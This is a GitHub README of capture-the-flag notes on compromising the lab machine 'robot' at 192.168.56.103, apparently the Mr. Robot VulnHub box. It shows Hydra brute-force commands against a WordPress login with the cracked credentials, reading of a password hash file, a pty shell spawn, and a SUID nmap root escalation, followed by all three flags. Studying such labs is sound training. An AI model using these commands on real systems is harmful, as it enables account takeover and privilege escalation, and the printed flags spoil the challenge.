-
Notifications
You must be signed in to change notification settings - Fork 0
hanabi-n/robot-lab
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
References 1. Search vulnerabilities https://charlesreid1.com/wiki/Metasploitable/Apache https://charlesreid1.com/wiki/Metasploitable/Apache/Python 2. Хотела это сделать, но не получилось https://www.hackingarticles.in/wordpress-reverse-shell/ 3. Hydra hacking https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/ 4. Privilege escalation https://gtfobins.github.io/gtfobins/nmap/ 1.Vulnerable for XSS 2.MIME sniffing 3.PHP 5.5.39 4.Using mod-negotiation Apache vulnerability. Got by metasploit /index.html - nothing /index.php - grep site /intro.webm - video /readme.html - "I like where you head is at. However I'm not going to help you." /sitemap.xml - "XML Parsing Error: no root element found" /xmlrpc.php - "XML-RPC server accepts POST requests only." 5. /admin/ - nothing /readme - same 6. Wordpress version <!-- generator="WordPress/4.3.1" --> 7. /license.txt -------content of the page ------------------- what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty? do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo= ----------------------------------------------- 9. /admin/index.html - nothing 10. search 11. /wp-login/ wordpress login page. password from /license.txt didn't help 12. /wordpress downloaded 2 files 13. /wp-admin/wp-login.php nothing 14. /wordpresswp-admin/wp-login.php nothing 15. /blog/wp-login.php nothing 16. /wp-login.php same 17. /wordpresswp-login.php nothing --------------enumeration-------------------- 1. Using Hydra to find username for /wp-login/ Command: hydra -vV -L userdic.txt -p somepassword 192.168.56.103 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' Output: [80][http-post-form] host: 192.168.56.103 login: elliot password: somepassword [ATTEMPT] target 192.168.56.103 - login "encounter" - pass "somepassword" - 5518 of 11452 [child 1] (0/0) [80][http-post-form] host: 192.168.56.103 login: Elliot password: somepassword [ATTEMPT] target 192.168.56.103 - login "encountered" - pass "somepassword" - 5519 of 11452 [child 7] (0/0) [ATTEMPT] target 192.168.56.103 - login "encounters" - pass "somepassword" - 5520 of 11452 [child 0] (0/0) [80][http-post-form] host: 192.168.56.103 login: ELLIOT password: somepassword 3. Find password Command: hydra -vV -l elliot -P userdic.txt 192.168.56.103 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' Output: [80][http-post-form] host: 192.168.56.103 login: elliot password: ER28-0652 4. Access to the admin shell through nc and php script daemon@linux:/home/robot$ cat password.raw-md5 cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b also had error: daemon@linux:/home/robot$ sudo su sudo su sudo: no tty present and no askpass program specified fix it: python -c 'import pty; pty.spawn("/bin/sh")' hash -> password abcdefghijklmnopqrstuvwxyz 5. flag-2 robot@linux:~$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 abcdefghijklmnopqrstuvwxyz 6. information about kernel and user 'robot' robot@linux:/opt/bitnami/apps/wordpress/htdocs$ sudo -l Sorry, user robot may not run sudo on linux. robot@linux:/opt/bitnami/apps/wordpress/htdocs$ id id uid=1002(robot) gid=1002(robot) groups=1002(robot) robot@linux:/opt/bitnami/apps/wordpress/htdocs$ umask umask 0002 robot@linux:/opt/bitnami/apps/wordpress/htdocs$ groups groups robot robot@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /etc/os-release 2>/dev/null NAME="Ubuntu" VERSION="14.04.2 LTS, Trusty Tahr" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 14.04.2 LTS" VERSION_ID="14.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" robot@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /proc/version Linux version 3.13.0-55-generic (buildd@brownie) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 ----------list of available functions-------------------- robot@linux:/$ find /bin -perm -4000 -type f 2> /dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su robot@linux:/$ find /usr -perm -4000 -type f 2> /dev/null /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown 7. Privilige Escalation Attempt 1. We can execute 'mount' but nothing happened: robot@linux:/$ sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount [sudo] password for robot: abcdefghijklmnopqrstuvwxyz robot is not in the sudoers file. This incident will be reported. robot@linux:/$ sudo mount sudo mount [sudo] password for robot: abcdefghijklmnopqrstuvwxyz robot is not in the sudoers file. This incident will be reported. Attempt 2. We can execute nmap: robot@linux:/$ TF=$(mktemp) robot@linux:/$ echo 'os.execute("/bin/sh")' > $TF robot@linux:/$ sudo nmap --script=$TF robot is not in the sudoers file. This incident will be reported. robot@linux:/$ sudo nmap --interactive robot is not in the sudoers file. This incident will be reported. Attempt 1 without sudo: robot@linux:/$ mount -o bind /bin/sh /bin/mount mount -o bind /bin/sh /bin/mount mount: only root can do that Attempt 2 without sudo: robot@linux:/$ nmap --script=$TF nmap --script=$TF nmap: unrecognized option '--script=/tmp/tmp.YOWMfsiDJH' !!!!!FINALLLYYY!!!!!!! robot@linux:/$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh !!!!!YASSSS!!!!!!!!!! # cat key-3-of-3.txt cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
About
No description, website, or topics provided.
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published